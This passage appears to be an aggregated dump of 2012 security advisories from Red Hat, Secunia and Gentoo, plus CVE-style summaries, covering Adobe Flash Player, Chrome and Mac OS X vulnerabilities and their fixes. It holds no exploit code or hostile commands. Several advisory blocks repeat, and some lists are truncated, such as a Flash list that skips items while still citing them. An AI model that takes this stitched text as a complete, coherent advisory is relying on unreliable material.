code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass intended access restrictions, bypass cross-domain policy, inject arbitrary web script, or obtain sensitive information. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. 5) An unspecified error can be exploited to bypass certain security restrictions. 6) An unspecified error can be exploited to bypass certain security restrictions. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, gain knowledge of potentially sensitive information, bypass certain security restrictions, and compromise a user's system

Adobe Flash Player before 10.3.183.15 and 11.x before 11.1.102.62 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.6 on Android 2.x and 3.x; and before 11.1.115.6 on Android 4.x allows attackers to bypass intended access restrictions via unspecified vectors, a different vulnerability than CVE-2012-0756. Adobe Flash Player Contains a vulnerability that prevents access restrictions. This vulnerability CVE-2012-0756 Is a different vulnerability.An attacker may be able to bypass access restrictions. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2012:0144-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0144.html Issue date: 2012-02-17 CVE Names: CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 CVE-2012-0767 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed on the Adobe security page APSB12-03, listed in the References section. Multiple security flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially-crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the specially-crafted SWF content. (CVE-2012-0752, CVE-2012-0753, CVE-2012-0754, CVE-2012-0755, CVE-2012-0756) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 791034 - CVE-2012-0752 CVE-2012-0753 CVE-2012-0754 CVE-2012-0755 CVE-2012-0756 flash-plugin: multiple code execution flaws (APSB12-03) 791035 - CVE-2012-0767 flash-plugin: universal cross-site scripting flaw (APSB12-03) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-10.3.183.15-1.el5.i386.rpm x86_64: flash-plugin-10.3.183.15-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-10.3.183.15-1.el6.i686.rpm x86_64: flash-plugin-10.3.183.15-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2012-0752.html https://www.redhat.com/security/data/cve/CVE-2012-0753.html https://www.redhat.com/security/data/cve/CVE-2012-0754.html https://www.redhat.com/security/data/cve/CVE-2012-0755.html https://www.redhat.com/security/data/cve/CVE-2012-0756.html https://www.redhat.com/security/data/cve/CVE-2012-0767.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb12-03.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2012 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFPPj8uXlSAg2UNWIIRApwYAJ40DTytRRob5RU/qeWrOqIfFF4TywCbBsdq 2hfvaUbJyuTg8og5n/gSdGc= =7NQZ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Google Chrome Multiple Vulnerabilities SECUNIA ADVISORY ID: SA48265 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48265/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 RELEASE DATE: 2012-03-05 DISCUSS ADVISORY: http://secunia.com/advisories/48265/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48265/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48265 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Google Chrome, where one has an unknown impact and others can be exploited by malicious people to conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system. 1) A use-after-free error exists within v8 element wrapper handling. 2) A use-after-free error exists within SVG value handling. 3) A buffer overflow exists within the Skia drawing library. 4) A use-after-free error exists within SVG document handling. 5) A use-after-free error exists within SVG use handling. 6) A casting error exists within line box handling. 7) A casting error exists within anonymous block splitting. 8) A use-after-free error exists within multi-column handling. 9) A use-after-free error exists within quote handling. 10) An out-of-bounds read error exists within text handling. 11) A use-after-free error exists within class attribute handling. 12) A use-after-free error exists within table section handling. 13) A use-after-free error exists within flexbox with floats handling. 14) A use-after-free error exists within SVG animation elements handling. For more information: SA48033 SOLUTION: Update to version 17.0.963.65. PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Chamal de Silva 2, 4, 5, 14) Arthur Gerkis 3) Aki Helin, OUSPG 6, 7, 8, 9, 10, 11, 12, 13) miaubiz ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2012/03/chrome-stable-update.html OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.228" References ========== [ 1 ] CVE-2011-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2445 [ 2 ] CVE-2011-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2450 [ 3 ] CVE-2011-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2451 [ 4 ] CVE-2011-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2452 [ 5 ] CVE-2011-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2453 [ 6 ] CVE-2011-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2454 [ 7 ] CVE-2011-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2455 [ 8 ] CVE-2011-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2456 [ 9 ] CVE-2011-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2457 [ 10 ] CVE-2011-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2458 [ 11 ] CVE-2011-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2459 [ 12 ] CVE-2011-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2460 [ 13 ] CVE-2012-0752 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0752 [ 14 ] CVE-2012-0753 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0753 [ 15 ] CVE-2012-0754 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0754 [ 16 ] CVE-2012-0755 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0755 [ 17 ] CVE-2012-0756 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0756 [ 18 ] CVE-2012-0767 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0767 [ 19 ] CVE-2012-0768 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0768 [ 20 ] CVE-2012-0769 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0769 [ 21 ] CVE-2012-0773 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0773 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201204-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . ---------------------------------------------------------------------- Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. 1) An unspecified error in an ActiveX Control can be exploited to corrupt memory. 2) A type confusion error can be exploited to corrupt memory. 3) An unspecified error related to MP4 parsing can be exploited to corrupt memory. 4) An unspecified error can be exploited to corrupt memory. Successful exploitation of the vulnerabilities #1 through #6 may allow execution of arbitrary code. 7) Certain unspecified input is not properly sanitised before being returned to the user. NOTE: This vulnerability is reportedly being actively exploited in targeted attacks. This fixes multiple vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, gain knowledge of potentially sensitive information, bypass certain security restrictions, and compromise a user's system

Apple Type Services (ATS) in Apple Mac OS X before 10.7.3 does not properly manage memory for data-font files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted font that is accessed by Font Book. Attackers can exploit this issue by enticing an unsuspecting user to open a malicious font file in the Font Book application. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X 10.6.8, Mac OS X Server 10.6.8, Mac OS X Lion 10.7 to 10.7.2 and Mac OS X Lion Server 10.7 to 10.7.2. ---------------------------------------------------------------------- SC Magazine awards the Secunia CSI a 5-Star rating Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296 ---------------------------------------------------------------------- TITLE: Apple Mac OS X Multiple Vulnerabilities SECUNIA ADVISORY ID: SA47843 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47843/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47843 RELEASE DATE: 2012-02-03 DISCUSS ADVISORY: http://secunia.com/advisories/47843/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/47843/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47843 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Apple has issued a security update for Mac OS X, which fixes multiple vulnerabilities. 1) The Address Book component downgrades to an unencrypted connection when an encrypted connection fails. This can be exploited to intercept CardDAV data. 2) An error in the bundled version of Apache can be exploited to cause a temporary DoS (Denial of Service). For more information: SA46013 3) A design error in Apache within the Secure Sockets Layer 3.0 (SSL) and Transport Layer Security 1.0 (TLS) protocols when using a block cipher in CBC mode can be exploited to decrypt data protected by SSL. 5) An error in CFNetwork when handling URLs can be exploited to disclose sensitive information via a specially crafted web page as a request could be sent to an incorrect origin server. 6) An error in CFNetwork when handling URLs can be exploited to disclose sensitive information via a specially crafted web page as unexpected request headers could be sent. 7) An integer overflow error in ColorSync when handling images with embedded ColorSync profiles can be exploited to cause a heap-based buffer overflow via a specially crafted image. 8) An error in CoreAudio when handling AAC encoded audio streams can be exploited to cause a buffer overflow when playing specially crafted audio content. 9) An error in CoreMedia when handling H.264 encoded movies can be exploited to cause a heap-based buffer overflow. 10) A use-after-free error in CoreText when handling documents containing fonts can be exploited to dereference already freed memory via a specially crafted font. 11) An error exists in CoreUI when handling long URLs and can be exploited via a specially crafted website. 12) An error in curl can be exploited by remote servers to impersonate clients via GSSAPI requests. For more information: SA45067 13) Two of the certificate authorities in the list of trusted root certificates have issued intermediate certificates to DigiCert Malaysia, who has issued certificates with weak keys that cannot be revoked. 14) A design error in dovecot within the Secure Sockets Layer 3.0 (SSL) and Transport Layer Security 1.0 (TLS) protocols when using a block cipher in CBC mode can be exploited to decrypt data protected by SSL. 15) An error in the uncompress command line tool when decompressing compressed files can be exploited to cause a buffer overflow. For more information: SA45544 16) An error in ImageIO when parsing TIFF images can be exploited to cause a buffer overflow. For more information see vulnerability #9: SA45325 17) An error in ImageIO when handling ThunderScan encoded TIFF images can be exploited to cause a buffer overflow. For more information see vulnerability #2: SA43593: 18) An error exists in the bundled version of libpng. For more information: SA46148 19) An error in Internet Sharing may cause the used Wi-Fi configuration to revert to factory defaults (e.g. disabling the WEP password) after a system update. 20) An error in Libinfo can be exploited to disclose sensitive information via a specially crafted website. For more information see vulnerability #4: SA46747 21) An integer overflow error in libresolv when parsing DNS resource records can be exploited to cause a heap-based buffer overflow. 22) An error in libsecurity may cause some EV certificates to be trusted even when the corresponding root is marked untrusted. 23) Multiple errors in OpenGL when handling GLSL compilation can be exploited to corrupt memory. 24) Multiple errors exist in the bundled version of PHP. For more information: SA44874 SA45678 25) Various errors in FreeType when handling Type 1 fonts can be exploited to corrupt memory. For more information: SA46575 26) An error in QuickTime when parsing MP4 encoded files can be exploited to access uninitialised memory. 27) A signedness error in QuickTime when handling font tables embedded in movie files can be exploited to corrupt memory. 28) An off-by-one error in QuickTime when handling rdrf atoms in movie files can be exploited to cause a single byte buffer overflow. 29) An error in QuickTime when parsing JPEG2000 images can be exploited to cause a buffer overflow. 30) An error in QuickTime when parsing PNG images can be exploited to cause a buffer overflow. 31) An error in QuickTime when handling FLC encoded movie files can be exploited to cause a buffer overflow. 32) Multiple errors exists in the bundled version of SquirrelMail. For more information: SA40307 SA45197 33) Various errors exist in the bundled version of Subversion. For more information: SA44681 34) Time Machine does not verify that a designated remote AFP volume or Time Capsule is used for subsequent backups. This can be exploited to access backups by spoofing the remote volume. 35) Errors exist in the bundled version of Tomcat. For more information: SA44981 36) An error in WebDAV Sharing when handling user authentication can be exploited by local users to gain escalated privileges. 37) An error exists in the bundled version of Webmail. For more information: SA45605 SOLUTION: Update to OS X Lion version 10.7.3 or apply Security Update 2012-001. PROVIDED AND/OR DISCOVERED BY: 4, 10) Will Dormann, CERT/CC The vendor also credits: 1) Bernard Desruisseaux, Oracle Corporation 5, 6) Erling Ellingsen, Facebook 7) binaryproof via ZDI 8, 27, 28, 29, 30) Luigi Auriemma via ZDI 9) Scott Stender, iSEC Partners 11) Ben Syverson 19) An anonymous person 21) Ilja van Sprundel, IOActive 22) Alastair Houghton 23) Chris Evans, Google Chrome Security Team and Marc Schoenefeld, Red Hat Security Response Team 26) Luigi Auriemma via ZDI and pa_kt via ZDI 31) Matt "j00ru" Jurczyk via ZDI 34) Michael Roitzsch, Technische Universit\xe4t Dresden 36) Gordon Davisson, Crywolf ORIGINAL ADVISORY: Apple Security Update 2012-001: http://support.apple.com/kb/HT5130 US-CERT: http://www.kb.cert.org/vuls/id/403593 http://www.kb.cert.org/vuls/id/410281 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Use-after-free vulnerability in CoreText in Apple Mac OS X before 10.7.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted embedded font in a document. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. The issue affects Mac OS X and Mac OS X Server versions prior to 10.7.3. NOTE: This issue was previously discussed in BID 51798 (Apple Mac OS X Prior to 10.7.3 Multiple Security Vulnerabilities) but has been given its own record to better document it. ---------------------------------------------------------------------- SC Magazine awards the Secunia CSI a 5-Star rating Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296 ---------------------------------------------------------------------- TITLE: Apple Mac OS X Multiple Vulnerabilities SECUNIA ADVISORY ID: SA47843 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47843/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47843 RELEASE DATE: 2012-02-03 DISCUSS ADVISORY: http://secunia.com/advisories/47843/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) 